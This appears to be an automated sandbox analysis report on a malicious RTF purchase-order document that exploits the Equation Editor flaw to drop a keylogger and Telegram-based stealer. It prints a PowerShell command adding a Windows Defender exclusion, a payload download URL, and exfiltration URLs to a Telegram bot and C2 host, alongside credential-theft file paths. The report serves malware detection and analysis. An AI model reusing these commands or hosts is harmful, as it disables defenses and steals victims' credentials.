Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-1326
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-1346

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Code function: 8_2_00259A4C LdrInitializeThunk,LdrInitializeThunk,

8_2_00259A4C

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_002ACC16 mov edx, dword ptr fs:[00000030h]

2_2_002ACC16

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Memory written: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Queries volume information: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Queries volume information: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Directory queried: C:\Users\user\Documents\VIPRecovery	Jump to behavior

Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Native API	2 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	11 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	11 Data from Local System	25 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	1 Clipboard Data	34 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Thyssenkrupp PO040232.doc	45%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
Thyssenkrupp PO040232.doc	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	0%	Avira URL Cloud	safe
http://crl.entrust.net/server1.crl0	0%	Avira URL Cloud	safe
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exee	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:	0%	Avira URL Cloud	safe
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	0%	Avira URL Cloud	safe
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Avira URL Cloud	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	Avira URL Cloud	safe
http://ns.adobe..0	0%	Avira URL Cloud	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exej	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
http://ns.adobe.c/D	0%	Avira URL Cloud	safe
https://www.google.com/search?q=wmf	0%	Avira URL Cloud	safe
https://www.google.com/sorry/index	0%	Avira URL Cloud	safe
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	0%	Avira URL Cloud	safe
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:	0%	Avira URL Cloud	safe
https://secure.comodo.com/CPS0	0%	Avira URL Cloud	safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
https://www.google.com/search?q=net	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
mail.jhxkgroup.online	217.12.218.219	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exee	EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002668000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:	EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
